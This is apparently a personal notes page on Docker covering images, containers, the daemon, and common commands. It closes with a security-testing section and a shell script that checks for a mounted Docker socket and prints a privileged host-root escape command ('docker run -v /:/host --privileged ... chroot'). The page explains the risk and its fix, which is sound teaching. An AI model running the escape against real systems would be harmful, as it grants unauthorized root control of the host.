
Docker


Docker is an open-source platform for building, shipping, and running applications in containers.
Containers are executable units of software that package an application together with the libraries, configuration, and other components it needs to run. Unlike virtual machines, containers share the host's operating system kernel, which makes them significantly more lightweight and faster to start. The same fact is the main security caveat: the kernel is a shared attack surface, so a kernel vulnerability reachable from one container affects every container on that host.

Core concepts#

  • Images: Read-only, layered templates containing the application code, libraries, and dependencies.
  • Containers: Runnable instances of an image. Isolation comes from Linux namespaces, cgroups, and capabilities on a shared kernel, so a container is a weaker security boundary than a virtual machine; a process that is root inside a container should be treated as root on the host unless the container has been deliberately hardened.
  • Dockerfile: A text file with instructions on how to build a Docker image.
  • Volumes: The preferred way to persist data. Since containers are ephemeral (their writable layer is lost when they are deleted), volumes store data on the host, managed by Docker, so it survives. Bind mounts of arbitrary host paths serve the same purpose but are also the usual way a container ends up with more host access than it needs.
  • Networks: These allow containers to communicate with each other and with the outside world. The default driver is the bridge network; every container on the default bridge can reach every other one, so use user-defined networks to limit which services can talk to which.
  • Docker Compose: A tool for defining and running multi-container applications using a single YAML file.
  • Docker Hub: A cloud-based registry for finding and sharing container images.

Architecture#

  • Docker Daemon (dockerd): The “brain” of the system. This background process manages all Docker objects, including images, containers, networks, and volumes. It normally runs as root.
  • Docker Client: The primary way you interact with Docker. When you type a command like docker run, the client sends that request to the daemon via a REST API, by default over the Unix socket /var/run/docker.sock (optionally over TCP). Because the daemon is root, anything that can write to that socket can start arbitrary containers and therefore effectively has root on the host.
  • Docker Host: The physical or virtual machine where the Docker Engine actually runs. It contains the daemon, images, and running containers.
  • Docker Registry: A centralized storage system for sharing images. Docker Hub is the default public registry, but organizations often use private ones like Amazon ECR or Google Artifact Registry.

Common Commands#

  • docker build -t <name> . : Builds an image from the Dockerfile in the current directory and tags it <name>.

  • docker run -p <host_port>:<container_port> <image> : Creates and starts a container from <image>, publishing a container port on the host.

  • docker ps : Lists currently running containers (add -a to include stopped ones).

  • docker stop <container_id> : Gracefully halts a running container (SIGTERM, then SIGKILL after a timeout).

  • docker pull <image_name> : Downloads an image from a registry (Docker Hub by default).

  • docker rm <container_id> : Deletes a stopped container.

  • docker exec -it <container> <command> : Runs a command inside an already running container; for example docker exec -it <container> sh gives an interactive shell.

  • Docker Engine installation guide: https://docs.docker.com/engine/install/

  • You can also use Docker Desktop to manage Docker containers.

  • Lazydocker is a TUI program for managing Docker from the terminal.


Security Testing#

The Docker documentation describes a Docker Desktop feature called “Enhanced Container Isolation” which, when enabled, blocks containers from bind-mounting the Docker socket by default, because whoever can talk to the Docker Engine through that socket controls every container on the host. Some workloads, such as test containers that need to start sibling containers, legitimately need socket access, so it often gets mounted anyway. The socket provides a means to drive the Engine API directly, so let’s see whether it has been handed to us.

From inside the container, check whether the socket is present:

ls -la /var/run/docker.sock

If the socket exists and is readable and writable by the current user, the container can talk to the Docker daemon on the host. Running docker ps from inside the container (or querying the API with curl --unix-socket if the docker CLI is not installed) confirms that the daemon answers and that we can perform Docker commands against it.

At that point the container boundary is gone. With socket access we can start a new privileged container that bind-mounts the host’s root filesystem, which gives a shell as root on the host; in other words, we can perform a Docker Escape attack. The only real fix is not mounting the socket (or a proxy that exposes only the endpoints the workload needs).
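The check above, and the client-to-daemon REST call described in the Architecture section, as one script. This is an added example, not code from the original post: it assumes the socket is at /var/run/docker.sock (override with DOCKER_SOCK) and that curl is available inside the container; the docker CLI is not required. The Engine API endpoints /version and /containers/json are real, but the container names and JSON in the comments are constructed for illustration. The escape command is only printed, never executed.

```shell
#!/bin/sh
# docker-sock-check.sh: run from inside a container to test whether the Docker
# Engine socket has been mounted and, if so, whether the daemon answers.
# Assumption: socket at /var/run/docker.sock unless DOCKER_SOCK is set.

DOCKER_SOCK="${DOCKER_SOCK:-/var/run/docker.sock}"

# Returns 0 only if the path is a Unix socket the current user can read and write.
# A socket that is present but not writable gives us nothing.
socket_reachable() {
  [ -S "$1" ] && [ -r "$1" ] && [ -w "$1" ]
}

# GET an Engine API endpoint over the Unix socket. This is exactly what the
# docker CLI does; the hostname after http:// is ignored by the daemon.
api_get() {
  curl -s --max-time 5 --unix-socket "$1" "http://localhost$2"
}

# The /version response always carries an ApiVersion field; use its presence
# to prove a Docker daemon (and not some other socket) answered.
api_responded() {
  case "$1" in
    *'"ApiVersion"'*) return 0 ;;
    *) return 1 ;;
  esac
}

# Count the containers in a /containers/json response: one top-level "Id" per container.
count_containers() {
  printf '%s' "$1" | grep -o '"Id":' | wc -l | tr -d ' '
}

# The command that turns socket access into host root: a new privileged
# container with the host's root filesystem bind-mounted at /host.
escape_command() {
  echo 'docker run --rm -it -v /:/host --privileged alpine chroot /host sh'
}

main() {
  if ! socket_reachable "$DOCKER_SOCK"; then
    echo "[-] $DOCKER_SOCK is not a reachable socket; no daemon access from here"
    return 0
  fi
  if ! command -v curl >/dev/null 2>&1; then
    echo "[!] socket present but curl missing; try: docker ps"
    return 0
  fi
  version="$(api_get "$DOCKER_SOCK" /version || true)"
  if api_responded "$version"; then
    echo "[+] daemon answered: $version"
    containers="$(api_get "$DOCKER_SOCK" /containers/json || true)"
    echo "[+] running containers visible through the socket: $(count_containers "$containers")"
    echo "[+] socket access is host root; escape with:"
    echo "    $(escape_command)"
  else
    echo "[-] socket present but no API response (permission denied or not a Docker socket)"
  fi
}

main "$@"
```

On a container without the socket the script reports the first branch and exits cleanly; on one with it, the daemon's /version JSON and the number of sibling containers are the proof that the API, and therefore the host, is reachable. Mounting /var/run/docker.sock read-only does not help: the API is driven by HTTP POST over the socket, and read-only bind mounts do not stop writes to a socket.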

https://nahil.xyz/vault/docker/
Author Nahil Rasheed
Published at September 29, 2025
Disclaimer This content is provided strictly for educational purposes only.